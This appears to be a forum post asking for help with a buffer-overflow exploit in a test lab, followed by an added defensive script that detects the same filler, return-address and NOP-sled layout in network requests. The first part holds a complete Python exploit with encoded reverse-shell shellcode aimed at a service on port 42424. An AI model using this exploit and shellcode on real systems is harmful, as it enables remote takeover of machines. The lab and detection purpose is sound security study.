
Can someone please help me with my BOF code


Hi, I am attempting to exploit a remote buffer overflow as part of a test lab environment.

The exploit works fine in a Windows 7 test VM, and I can get a reverse Meterpreter to my Kali Linux VM with ASLR turned off on the Windows VM.

However, when I attempt this in the test environment against the machine that I know is running the application on port 42424, I do not get the reverse shell. I have tried this with both x86 and x64 shellcode. If I test locally on the Kali machine, I can crash the application but again do not get a shell. My exploit code is below.

#!/usr/bin/env python2
import socket

ServiceManagerIP = "127.0.0.1"
ServiceManagerPort = 42424

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ServiceManagerIP, ServiceManagerPort))

payload = "\xc3"*146    # Junk bytes filling the buffer up to the saved return address

# Overwrite the return address with 0x77E9F7DF (written little-endian),
# followed by a 16-byte NOP sled leading into the shellcode
payload += "\xDF\xF7\xE9\x77" + "\x90" *16

#Shellcode to be executed by application

payload += ("\xdb\xca\xd9\x74\x24\xf4\xb8\x0b\x9d\x83\x98\x5f\x2b\xc9\xb1"
"\x52\x83\xc7\x04\x31\x47\x13\x03\x4c\x8e\x61\x6d\xae\x58\xe7"
"\x8e\x4e\x99\x88\x07\xab\xa8\x88\x7c\xb8\x9b\x38\xf6\xec\x17"
"\xb2\x5a\x04\xa3\xb6\x72\x2b\x04\x7c\xa5\x02\x95\x2d\x95\x05"
"\x15\x2c\xca\xe5\x24\xff\x1f\xe4\x61\xe2\xd2\xb4\x3a\x68\x40"
"\x28\x4e\x24\x59\xc3\x1c\xa8\xd9\x30\xd4\xcb\xc8\xe7\x6e\x92"
"\xca\x06\xa2\xae\x42\x10\xa7\x8b\x1d\xab\x13\x67\x9c\x7d\x6a"
"\x88\x33\x40\x42\x7b\x4d\x85\x65\x64\x38\xff\x95\x19\x3b\xc4"
"\xe4\xc5\xce\xde\x4f\x8d\x69\x3a\x71\x42\xef\xc9\x7d\x2f\x7b"
"\x95\x61\xae\xa8\xae\x9e\x3b\x4f\x60\x17\x7f\x74\xa4\x73\xdb"
"\x15\xfd\xd9\x8a\x2a\x1d\x82\x73\x8f\x56\x2f\x67\xa2\x35\x38"
"\x44\x8f\xc5\xb8\xc2\x98\xb6\x8a\x4d\x33\x50\xa7\x06\x9d\xa7"
"\xc8\x3c\x59\x37\x37\xbf\x9a\x1e\xfc\xeb\xca\x08\xd5\x93\x80"
"\xc8\xda\x41\x06\x98\x74\x3a\xe7\x48\x35\xea\x8f\x82\xba\xd5"
"\xb0\xad\x10\x7e\x5a\x54\xf3\x41\x33\x39\x82\x2a\x46\xc5\x9a"
"\xcb\xcf\x23\xc8\x1b\x86\xfc\x65\x85\x83\x76\x17\x4a\x1e\xf3"
"\x17\xc0\xad\x04\xd9\x21\xdb\x16\x8e\xc1\x96\x44\x19\xdd\x0c"
"\xe0\xc5\x4c\xcb\xf0\x80\x6c\x44\xa7\xc5\x43\x9d\x2d\xf8\xfa"
"\x37\x53\x01\x9a\x70\xd7\xde\x5f\x7e\xd6\x93\xe4\xa4\xc8\x6d"
"\xe4\xe0\xbc\x21\xb3\xbe\x6a\x84\x6d\x71\xc4\x5e\xc1\xdb\x80"
"\x27\x29\xdc\xd6\x27\x64\xaa\x36\x99\xd1\xeb\x49\x16\xb6\xfb"
"\x32\x4a\x26\x03\xe9\xce\x56\x4e\xb3\x67\xff\x17\x26\x3a\x62"
"\xa8\x9d\x79\x9b\x2b\x17\x02\x58\x33\x52\x07\x24\xf3\x8f\x75"
"\x35\x96\xaf\x2a\x36\xb3")

s.send(payload+"\r\n")
data = s.recv(1024)    # was s.recv(len(msg)): msg is never defined, so that line raised NameError
s.recv(1024)
s.close()
print data
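Looking at the same payload layout from the other side of the wire, here is an added example of mine (not from the post) that parses that filler / little-endian address / NOP-sled shape the way a network detector for the service port would; the two sample requests, the thresholds and the placeholder bytes standing in for shellcode are all constructed for the example.

```python
#!/usr/bin/env python3
"""Flag requests that have the filler / return-address / NOP-sled shape of a
classic stack overflow (detection-side view of the payload layout above)."""
from collections import namedtuple

# Constructed sample traffic to the service port; neither is a real capture.
BENIGN_REQUEST = b"STATUS\r\n"
SUSPECT_REQUEST = (
    b"\xc3" * 146                          # filler up to the saved return address
    + (0x77E9F7DF).to_bytes(4, "little")   # address, little-endian as in the post
    + b"\x90" * 16                         # NOP sled
    + bytes(range(0x20, 0x60))             # placeholder bytes, not real shellcode
    + b"\r\n"
)

Finding = namedtuple("Finding", "filler_len return_addr sled_len")


def inspect_request(data, min_filler=64, min_sled=8):
    """Return a Finding when `data` shows the overflow shape, else None.
    The thresholds are assumed defaults; tune them per service."""
    # 1. A NOP sled: a run of at least min_sled 0x90 bytes.
    sled_at = data.find(b"\x90" * min_sled)
    if sled_at < 0 or sled_at < 4 + min_filler:
        return None
    sled_len = 0
    while sled_at + sled_len < len(data) and data[sled_at + sled_len] == 0x90:
        sled_len += 1
    # 2. The 4 bytes just before the sled are the overwritten return address;
    #    decoding them little-endian recovers the value that was aimed at.
    return_addr = int.from_bytes(data[sled_at - 4:sled_at], "little")
    # 3. Before the address: a long run of one filler byte (0x41, 0xC3, ...).
    filler = data[:sled_at - 4]
    filler_len = len(filler) - len(filler.rstrip(filler[-1:]))
    if filler_len < min_filler:
        return None
    return Finding(filler_len, return_addr, sled_len)


if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQUEST), ("suspect", SUSPECT_REQUEST)):
        print(name, inspect_request(req))
```

Run against the suspect request it reports 146 filler bytes, return address 0x77E9F7DF and a 16-byte sled, which is exactly the layout the post's `payload` variable builds.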
